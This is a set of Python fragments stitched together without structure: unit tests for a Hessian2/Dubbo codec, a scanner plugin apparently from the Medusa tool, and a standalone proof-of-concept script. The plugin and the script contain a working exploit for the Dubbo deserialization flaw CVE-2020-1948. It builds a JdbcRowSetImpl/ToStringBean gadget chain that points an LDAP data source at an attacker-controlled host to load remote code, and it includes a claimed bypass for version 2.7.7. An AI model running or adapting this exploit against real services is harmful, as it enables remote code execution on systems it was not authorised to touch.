def test_new_object():
obj = new_object('a.b.c.d', a=1, b=2)
assert obj.__class__.__name__ == 'a.b.c.d'
assert obj.a == 1
assert obj.b == 2
assert obj._fields == ('a', 'b')
obj_simple = new_object('child', c=1)
assert obj_simple.__class__.__name__ == 'child'
assert obj_simple.c == 1
assert obj_simple._fields == ('c', )
def test_encode_object():
assert encode_object(None) == b'N'
assert encode_object(True) == b'T'
assert encode_object(False) == b'F'
assert encode_object('abcde') == b'\x05abcde'
assert encode_object('') == b'\x00'
assert encode_object(long(1000)) == b'\xfb\xe8'
assert encode_object(long(190000)) == b'>\xe60'
assert encode_object(long(1234567890)) == b'YI\x96\x02\xd2'
assert encode_object(1000) == b'\xcb\xe8'
assert encode_object(190000) == b'\xd6\xe60'
assert encode_object(323875) == b'I\x00\x04\xf1#'
assert encode_object('a' * 100) == b'0d' + b'a' * 100
assert encode_object('a' * 10000) == b"S'\x10" + b'a' * 10000
assert encode_object(
{
'androidDeviceRoot': False,
'hardid': '',
'phone_number': '12345678901',
'engine_result': 'ACCEPT',
'process_time': '2018-07-30 14:41:04'
}
) == b'H\x11androidDeviceRootF\x06hardid\x00\x0cphone_number\x0b12345678901\rengine_result\x06ACCEPT\x0cprocess_time\x132018-07-30 14:41:04Z'
assert encode_object(new_object('com.xxx.test', a=1, b=2), 0,
[]) == b'C\x0ccom.xxx.test\x92\x01a\x01b`\x91\x92'
assert encode_object(JavaList([long(2)])) == b'q\x0ejava.util.List\xe2'
assert encode_object(JavaList(
[long(2)] *
8)) == b'\x56\x0ejava.util.List\x98\xe2\xe2\xe2\xe2\xe2\xe2\xe2\xe2'
assert encode_object([2]) == b'y\x92'
child = new_object('child', b=long(2))
obj = new_object('parent', a=child)
assert encode_object(
obj, 0, []) == b'C\x06parent\x91\x01a`C\x05child\x91\x01ba\xe2'
assert encode_object(0.0) == b'\x5b'
assert encode_object(1.0) == b'\x5c'
assert encode_object(127.0) == b'\x5d\x7f'
assert encode_object(-127.0) == b'\x5d\x81'
assert encode_object(1.123) == b'\x5f\x00\x00\x04c'
assert encode_object(-1.123) == b'\x5f\xff\xff\xfb\x9d'
assert encode_object(0.12345) == b'D?\xbf\x9akP\xb0\xf2|'
assert encode_object(-0.12345) == b'D\xbf\xbf\x9akP\xb0\xf2|'
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") #获取传入的url参数
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
client = DubboClient(url, int(port))
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://" + DL.dns_host(),
strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl)
resp = client.send_request_and_return_response(
service_name=
'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
method_name='$invoke',
args=[toStringBean])
time.sleep(3)
if DL.result():
Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(
url, DL.dns_text(), DL.dns_host(), str(resp))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
ExploitUrl = kwargs.get("ExploitUrl")
try:
client = DubboClient(url, int(port))
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://" + ExploitUrl,
strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl)
resp = client.send_request_and_return_response(
service_name=
'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
method_name='$invoke',
args=[toStringBean])
ExploitOutput().Banner() #无回显调用函数
_t = VulnerabilityInfo(str(resp))
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def test_response_encode():
assert DubboResponse(7, DubboResponse.OK, {}, None).encode(
) == b'\xda\xbb\x02\x14\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x03\x91HZ'
assert DubboResponse(
1, DubboResponse.OK,
new_object('com.xxxxxxxxxxxx.yyyy.api.Zzzzz',
fieldAaaaaa=True,
fieldBbbbbb=True,
fieldCc='710b918c-e686-4268-917d-06a540e23564',
fieldDddd='hello'), None
).encode(
) == b'\xda\xbb\x02\x14\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00|\x91C\x1fcom.xxxxxxxxxxxx.yyyy.api.Zzzzz\x94\x0bfieldAaaaaa\x0bfieldBbbbbb\x07fieldCc\tfieldDddd`TT0$710b918c-e686-4268-917d-06a540e23564\x05hello'
assert DubboResponse(
1, DubboResponse.OK,
new_object('com.xxxxxxxxxxxx.wwww.api.Zzzzz',
fieldAaaaaa=True,
fieldBbbbbb=True,
fieldCc='710b918c-e686-4268-917d-06a540e23564',
fieldDddd='hello'), None
).encode(
) == b'\xda\xbb\x02\x14\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00|\x91C\x1fcom.xxxxxxxxxxxx.wwww.api.Zzzzz\x94\x0bfieldAaaaaa\x0bfieldBbbbbb\x07fieldCc\tfieldDddd`TT0$710b918c-e686-4268-917d-06a540e23564\x05hello'
from dubbo.codec.hessian2 import Decoder, new_object
from dubbo.client import DubboClient
import sys
client = DubboClient('127.0.0.1', int(sys.argv[1]))
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://127.0.0.1:1389/Exploit",
strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl)
# POC 1 CVE-2020-1948
# resp = client.send_request_and_return_response(
# service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
# method_name='rce',
# args=[toStringBean])
# 2.7.7 bypass
resp = client.send_request_and_return_response(
service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
method_name=[toStringBean],
service_version='1.0.0',
args=[])
print(resp)
